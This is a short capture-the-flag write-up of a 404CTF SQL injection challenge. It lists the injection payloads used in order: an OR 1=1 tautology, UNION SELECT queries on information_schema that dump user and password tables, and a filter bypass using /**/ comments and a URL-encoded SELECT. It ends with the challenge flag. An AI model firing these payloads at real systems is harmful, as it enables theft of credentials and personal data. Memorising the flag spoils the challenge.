Le Braquage : Basic SQL Injection
Part 1 : Or
By trial and error, we find that the character used to comment out is # and ' is used as quotes :
Request :
' OR 1=1 #
Part 2 : Union
First we need to find out what's the name of the table we are trying to get to.
Request
' OR 1=1 UNION SELECT table_name,1 FROM information_schema.tables#
Then we need to find out what's the name of the column.
Request for info :
' OR 1=1 UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='Users'#
And with the info that we've gathered we retrieve parts of our flag.
Request to retrieve part of the flag :
' OR 1=1 UNION SELECT nom,prenom FROM Users #
Part 3 : Bypassing filters
This time we do the same but spaces and the word SELECT are filtered out so we just used the trick of using comments to replace the spaces /**/ and encode the word SELECT which gives us %53%45%4c%45%43%54. Then we repeat the same steps as before.
First we need to find out what's the name of the table we are trying to get to.
Request for info :
'/**/OR/**/1=1/**/UNION/**/%53%45%4c%45%43%54/**/table_name,1,1/**/FROM/**/information_schema.tables#
Request for info :
'/**/OR/**/1=1/**/UNION/**/%53%45%4c%45%43%54/**/column_name,1,1/**/FROM/**/information_schema.columns/**/WHERE/**/table_name='Password'#
And now with the info we can finally make the last query to retrieve the last parts of our flag.
Request to retrieve the last parts of the flag :
'/**/OR/**/1=1/**/UNION/**/%53%45%4c%45%43%54/**/id,mdp,3/**/FROM/**/Password#
Flag : 404CTF{VereuxUnGorfou014576945621ruedeskiwis2022-07-1401hDuMatinGorfousAuPouvoir}